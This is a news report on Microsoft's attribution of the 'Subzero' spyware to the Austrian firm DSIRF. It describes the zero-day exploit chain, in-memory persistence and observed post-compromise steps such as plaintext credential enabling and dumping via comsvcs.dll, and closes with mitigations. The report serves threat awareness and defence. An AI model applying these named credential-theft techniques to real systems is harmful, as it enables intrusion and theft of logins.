Microsoft Denounces Advanced Spyware in Bid to Defuse ItThreat Actor Uses Zero-Days to Deliver 'Subzero' Malware
An Austrian alleged purveyor of advanced spyware uses multiple Microsoft and Adobe zero-days to infect victims' computers, the operating system giant revealed in a bid to neutralize the cyberweapon supplier's hacking tool.
Microsoft fingers Vienna-based DSIRF as the threat actor behind malware known as "Subzero," a spyware application capable of keylogging, exfiltrating files and making remote updates. Known victims include law firms, banks and consultancies in Austria, the United Kingdom and Panama.
The Microsoft Threat Intelligence Center says it tracked cyberespionage activities to DSIRF, which claims to provide "tailored research operations" to corporate clients. Microsoft says it discovered a command-and-control infrastructure and a GitHub account associated with the Austrian firm and a code-signing certificate issued to DSIRF was used to sign an exploit. The company did not respond to a request for comment. Microsoft bestowed the moniker "Knotweed" on the DSIRF malware.
The researcher's publication comes at a moment of heightened scrutiny of commercial spyware apps with intelligence agency-level capabilities. At least 30 such vendors now exist worldwide - a considerable jump from the handful of just a few years ago. U.S. lawmakers have pledged action against the firms while technology giants Facebook and Apple are suing premier spyware maker NSO Group in federal court (see: Tech Alone Won't Defeat Advanced Spyware, US Congress Told).
The Exploit Chain Used
The malware involves two phases: gaining access to victims' computers using zero-days and deploying the malware.
Attackers achieve the first phase through a variety of methods that include exploiting zero-day vulnerabilities or malicious Office document macros, a regular go-to method for hackers.
Notable among the exploited zero-days is a recently patched vulnerability that allows attackers to elevate their operating system access, tracked as CVE-2022-22047. Microsoft released the patch weeks ago as part of the company's monthly dump of fixes (see: July Patch Tuesday Fixes 1 Zero-Day, 84 Flaws).
Attackers exploited the vulnerability through a malicious PDF containing code able to escape the Adobe Reader sandbox and write a malicious dynamic link library to disk. They were able to get around Adobe sandbox restrictions preventing software writing out files since it's not until afterward that attackers hijack a system process to load the malicious DLL. In the Adobe sandbox, "the ability to write out files where the attacker cannot control the path isn't considered dangerous," Microsoft says.
The malware also previously exploited two Windows privilege escalation bugs - CVE-2021-31199 and CVE-2021-31201 - in conjunction with an Adobe Reader bug CVE-2021-28550 in an exploit chain to deploy Subzero spyware. All these bugs were patched in June 2021 (see: Microsoft Patches 6 Vulnerabilities Currently Under Attack).
Another Windows privilege escalation zero-day, CVE-2021-36948, in the Windows Update Medic Service, allows an attacker to force the service to load an arbitrary signed DLL. "The malicious DLL used in the attacks was signed by 'DSIRF GmbH,'" Microsoft says. Microsoft fixed the bug in August 2021.
The threat actor has also deployed a malicious Excel document disguised as a real estate document containing a malicious macro that was obfuscated by large chunks of text from the Kama Sutra describing the utility of an intermediary to initiate an affair.
Once attackers establish Subzero on a computer, they deploy the primary payloads from a command-and control-server. Microsoft dubs the second-stage software "Corelump" and says it was designed to evade detection by residing exclusively in memory. Corelump ensures persistence by installing Trojanized binaries Microsoft calls "Jumplump," which become responsible for loading Corelump into memory by calling code embedded into a jpeg saved to the computer's temp folder.
One of the jpegs used by attackers is an image macro of North Korean hereditary Supreme Leader Kim Jong-un holding an acoustic guitar, with the text, "Can I eat this?"
MSTIC also observed several post-compromise actions on its victims' systems. These include:
- Setting UseLogonCredential to "1" to enable plaintext credentials;
- Credential dumping via comsvcs.dll;
- Attempting to access emails with dumped credentials from a KNOTWEED IP address;
- Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com;
- Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF.
Based on an analysis of the spyware campaign, Microsoft recommends the following mitigation measures:
- Patch CVE-2022-22047.
- Update Microsoft Defender Antivirus.
- Look out for indicators of compromise on MSTIC's security blog to detect the existence of malware in your environment.
- Change Excel macro security settings to control which macros run and under what circumstances when opening a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface is on.
- Enable multifactor authentication to mitigate potentially compromised credentials.
- Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single-factor authentication, to confirm authenticity and investigate any anomalous activity.